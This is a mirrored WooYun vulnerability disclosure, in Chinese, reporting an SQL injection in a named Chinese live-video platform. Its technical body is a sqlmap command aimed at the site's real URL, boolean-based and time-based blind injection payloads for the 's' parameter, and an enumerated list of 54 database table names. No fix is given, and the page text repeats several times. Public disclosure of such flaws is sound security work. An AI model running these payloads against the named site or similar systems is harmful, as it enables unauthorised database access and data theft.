某云视频直播平台存在SQL注入漏洞

admin

139625
文章

114
评论

2017年4月19日22:31:36评论258 views字数 215阅读0分43秒阅读模式

摘要

2016-04-06：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-05-21：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(4) 关注此漏洞

缺陷编号： WooYun-2016-192961

漏洞标题：某云视频直播平台存在SQL注入漏洞

漏洞作者：绿箭侠

提交时间： 2016-04-06 09:30

公开时间： 2016-05-21 09:40

漏洞类型： SQL注射漏洞

危害等级：中

自评Rank： 6

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： php+数字类型注射

0人收藏

漏洞详情

披露状态：

2016-04-06：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-05-21：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

核心团队均来自腾讯等知名互联网企业，在互联网产品规划、云平台建设、流媒体技术领域经验丰富、建树颇多，在解决国内视频直播技术领域具有绝对的优势和前瞻性，被行业推崇为最具发展潜力的视频互动直播。

某云视频直播平台存在SQL注入漏洞

详细说明：

code 区域

python sqlmap.py -u "http://www.jingchang.tv/index.php?s=/Home/Index/new_show/id/21" --tables -D "cloud"

漏洞证明：

code 区域

sqlmap identified the following injection point(s) with a total of 102 HTTP(s) requests:
 ---
 Parameter: s (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: s=/Home/Index/new_show/id/21) AND 8951=8951 AND (1886=1886
 
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: s=/Home/Index/new_show/id/21) AND (SELECT * FROM (SELECT(SLEEP(5)))XNqn) AND (3272=3272
 ---
 back-end DBMS: MySQL 5.0.12
 current database:    'cloud'
 sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: s (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: s=/Home/Index/new_show/id/21) AND 8951=8951 AND (1886=1886
 
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: s=/Home/Index/new_show/id/21) AND (SELECT * FROM (SELECT(SLEEP(5)))XNqn) AND (3272=3272
 ---
 back-end DBMS: MySQL >= 5.0.0
 current user:    ''
 sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: s (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: s=/Home/Index/new_show/id/21) AND 8951=8951 AND (1886=1886
 
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: s=/Home/Index/new_show/id/21) AND (SELECT * FROM (SELECT(SLEEP(5)))XNqn) AND (3272=3272
 ---
 back-end DBMS: MySQL 5
 Database: cloud
 [54 tables]
 +-----------------------+
 | jck_action            |
 | jck_action_log        |
 | jck_addons            |
 | jck_api_group         |
 | jck_api_record        |
 | jck_apidoc_log        |
 | jck_apidoc_main       |
 | jck_apidoc_params     |
 | jck_apidoc_return     |
 | jck_attachment        |
 | jck_attribute         |
 | jck_auth_extend       |
 | jck_auth_group        |
 | jck_auth_group_access |
 | jck_auth_rule         |
 | jck_camera_category   |
 | jck_camera_channel    |
 | jck_camera_group      |
 | jck_camera_main       |
 | jck_camera_session    |
 | jck_camera_type       |
 | jck_category          |
 | jck_channel           |
 | jck_company_banner    |
 | jck_company_category  |
 | jck_company_document  |
 | jck_company_menu      |
 | jck_config            |
 | jck_device_camera     |
 | jck_device_main       |
 | jck_document          |
 | jck_document_article  |
 | jck_document_download |
 | jck_file              |
 | jck_general_count     |
 | jck_general_nations   |
 | jck_general_provinces |
 | jck_hooks             |
 | jck_menu              |
 | jck_model             |
 | jck_picture           |
 | jck_social_action     |
 | jck_social_discuz     |
 | jck_social_friends    |
 | jck_social_related    |
 | jck_store_auth        |
 | jck_ucenter_admin     |
 | jck_ucenter_app       |
 | jck_ucenter_member    |
 | jck_ucenter_setting   |
 | jck_url               |
 | jck_user_article      |
 | jck_user_main         |
 | jck_userdata          |
 +-----------------------+
 
 sqlmap resumed the following injection point(s) from stored session:

修复方案：

版权声明：转载请注明来源绿箭侠@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：8 (WooYun评价)

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):

登陆后才能进行评分

100%

某云视频直播平台存在SQL注入漏洞

漏洞概要关注数(4) 关注此漏洞

缺陷编号： WooYun-2016-192961

漏洞标题：某云视频直播平台存在SQL注入漏洞

相关厂商：经常直播

漏洞作者：绿箭侠

提交时间： 2016-04-06 09:30

公开时间： 2016-05-21 09:40

漏洞类型： SQL注射漏洞

危害等级：中

自评Rank： 6

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： php+数字类型注射

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源绿箭侠@乌云

漏洞回应

厂商回应：

漏洞评价：

漏洞评价(少于3人评价):

登陆后才能进行评分

评价

WooYun.org-优酷多个分站存在SSRF漏洞大礼包

WooYun.org-优特捷某内部邮箱账户外泄涉及大量敏感信息(多家合作单位躺枪)

WooYun.org-某网平行权限漏洞（影响所有使用用户）

Bypass分享 | 形而上学，不行退学的一句话

格兰仕千万数据库信息泄露

3399游戏源码下载

WEFANS喂饭后台弱口令

国家电网某充电APP系统Getshell涉及大量用户敏感信息

威锋网游戏站存在SQL注入（含多重绕过+编码）

APP安全之三维度从一个毫无用处的xss到获取大量身份证信息图片(包括李刚身份证)

发表评论

在线咨询

微信

漏洞概要 关注数(4) 关注此漏洞

缺陷编号： WooYun-2016-192961

漏洞标题： 某云视频直播平台存在SQL注入漏洞

相关厂商： 经常直播

漏洞作者： 绿箭侠

提交时间： 2016-04-06 09:30

公开时间： 2016-05-21 09:40

漏洞类型： SQL注射漏洞

危害等级： 中

自评Rank： 6

漏洞状态： 未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： php+数字类型注射

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 绿箭侠@乌云

漏洞回应

厂商回应：

漏洞评价：

漏洞评价(少于3人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(4) 关注此漏洞

漏洞标题：某云视频直播平台存在SQL注入漏洞

相关厂商：经常直播

漏洞作者：绿箭侠

危害等级：中

漏洞状态：未联系到厂商或者厂商积极忽略

版权声明：转载请注明来源绿箭侠@乌云

漏洞评价(少于3人评价):

登陆后才能进行评分